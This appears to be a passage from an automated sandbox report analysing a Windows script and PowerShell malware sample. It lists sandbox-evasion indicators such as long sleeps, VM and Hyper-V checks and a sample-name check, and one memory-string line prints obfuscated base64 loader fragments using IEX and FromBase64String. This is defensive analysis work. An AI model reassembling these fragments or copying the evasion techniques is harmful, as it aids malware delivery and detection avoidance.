                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  .NET source code contains a sample name check
                  Source: 22.2.powershell.exe.a16893c.11.raw.unpack, tjjjj.cs.Net Code: Main contains sample name check
                  Source: 22.2.powershell.exe.a6c382c.7.raw.unpack, tjjjj.cs.Net Code: Main contains sample name check
                  Source: 22.2.powershell.exe.96e0000.3.raw.unpack, tjjjj.cs.Net Code: Main contains sample name check
                  Source: 22.2.powershell.exe.a15e2d4.12.raw.unpack, tjjjj.cs.Net Code: Main contains sample name check
                  Source: 22.2.powershell.exe.a6a0b58.8.raw.unpack, tjjjj.cs.Net Code: Main contains sample name check
                  Source: 22.2.powershell.exe.a26258c.6.raw.unpack, tjjjj.cs.Net Code: Main contains sample name check
                  Source: 30.2.powershell.exe.a419e48.5.raw.unpack, tjjjj.cs.Net Code: Main contains sample name check
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4150Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5722Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7510Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2211Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: foregroundWindowGot 693Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: foregroundWindowGot 723Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7787
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1986
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7930
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1623
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6715
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3011
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8079
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1496
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9299
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5904
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9418
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5827
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ilcg05nv.dllJump to dropped file
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4688Thread sleep count: 4150 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4284Thread sleep count: 5722 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3208Thread sleep time: -13835058055282155s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4508Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7676Thread sleep count: 7787 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7680Thread sleep count: 1986 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7704Thread sleep time: -5534023222112862s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8048Thread sleep count: 7930 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8048Thread sleep count: 1623 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8076Thread sleep time: -11990383647911201s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7260Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7580Thread sleep count: 6715 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7544Thread sleep count: 3011 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7532Thread sleep time: -4611686018427385s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7904Thread sleep count: 8079 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7968Thread sleep count: 1496 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4724Thread sleep time: -14757395258967632s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7336Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7412Thread sleep count: 9299 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7448Thread sleep time: -13835058055282155s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3056Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2136Thread sleep count: 259 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7508Thread sleep count: 5904 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1560Thread sleep time: -8301034833169293s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1628Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3448Thread sleep count: 196 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7708Thread sleep count: 9418 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6540Thread sleep time: -8301034833169293s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1580Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1052Thread sleep count: 5827 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8188Thread sleep time: -7378697629483816s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2636Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: wscript.exe, 00000000.00000002.2138264909.000001A8A66B6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\z
                  Source: wscript.exe, 00000000.00000002.2138264909.000001A8A66B6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: powershell.exe, 00000004.00000002.2289800081.0000012971385000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW\4
                  Source: powershell.exe, 0000002B.00000002.2936384962.000000000843F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll|G
                  Source: powershell.exe, 0000001E.00000002.2809296079.000000000814A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ZGFlUidbLTEtuvk=VWlhOMExWQmhkR2dnSkhKtwnj=xjeTRpQ2lBZ0lDQjlDbjBtwxu=mViZWl0bXlzbHNnamhqemucwz=pKQl7CQkkZG5xZWw9JHlkudtd=npkamlsemxiLkRpc3Bvc2uidy=bWFpbm1teG56YXh6aHJvauksh=YmpqbmR4dXB2bmppc3F5aulfn=pQWtjR0YwYUNJS0lDQWdJunjd=ycuUmVwbGFjZSgnQUJDJyupkq=3Zmx1djE0TFVqSG9zU0druqlf=dE1UVHBjVTA5R1ZGZEJVaurch=52bmh0dG9jd3NuenhlY25urxt=\poUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userusof=Powuswd=cXpqZ291bHd2ZGEuRGlzcutxq=iYnhyeXV2dHpzb2VjdmZxuuaw=wYXJhbV92YXIsJHBhcmFtuvhb=yk7SUVYICckcHpvY2V4eWuwlb=KbFoxQmhkR2dnUFNBaVNFuwmz=HdsaHhwcHJuICRwem9jZXuwnv=VGV4dC5FbmNvZGluZ106Ouxex="C:\uyxg=ykoJ2FXVjRJQ2hKYm5admuzty=Ml92YXIpewkJSUVYICckbuzyd=KCRtbHF4Z2JieHJ5dXZ0evbjq=RwYXJhbV92YXIpewlJRVgvecd=s\Svenu=Lkxlbmd0aCk7CSRkZWNyevftw=N1bmViZWl0bXlzbHNnamhvfui=dGVtLkNvbnZlcnRdOjooJvipj=kNvbkFCQy5Db0FCQ21wQUvlpe=CsgJ0FCQ1xBQkNkQUJDd0vozg=DNEFCQ1NBQkN0ckFCQ2lBvrrg=BnUjJWMExVMXdVSEpsWm1vumn=aXl6dDskdWR5eHI9W1N5cvyry=exewavh=WeVpXNWpaU0I4SUZObGJHwbzx=WdJQ0JPWlhjdFNYUmxiU0wccr=xcD1pYnB4Z21oanR3a2Jnwindir=C:\Windowswjzdo=swkoy=a2h2ZW90eXZhc2xiPU5ldwlmx=IC1TZWNvbmRzIDU7ZnVuYwpss=F0VUdGMGFDQWtjbVZuVUdwrvj=2ZXNhQm1vckYnWy0xLi4twzpx=1.0wzrp=ppc3F5anpkamlsemxiKTsxgbo=h6aHJvaHdsaHhwcHJuKCRxgqz=bW14bnpheHpocm9od2xoexlwe=([Convert]::FromBase6Xoal=1 xowp=KCdBQkMnLCAnJyk7JGhvcxtop=3RlbS5JTy5GaWxlXTo6KCxvcu=xudHJ4Yndta3pmbHFwa3Nxxpa=weryawo=ZW0uU2VjdXJpdHkuQ3J5cyetv=l\vyfpq=2piZnpvd2J1LkFCQ0VBQkygue=uLi0xMV0gLWpvaW4gJycpyhah=93VGl0bGUgPSAkbWxxeGdyikg=E2XSAtam9pbiAnJykoJ0lyjga=GMGFDQXRSbTl5WTJVS2ZRynqa=FhbHZpd3Jmb2JyeHl2PSRyntz=4String('SUVYKFtUZXh0yomp=IzUmpiMjUwWVdsdWN5QWtyqwqm=tysou=b3FpdGxhaWJtY2tlY3F0eytjh=zZFhQRHRXVnpDaUFnSUNByyhb=EdWdElnb2tjbVZuVG1GdFyznr=mJtRWd
                  Source: powershell.exe, 0000002B.00000002.2823019650.0000000000C94000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 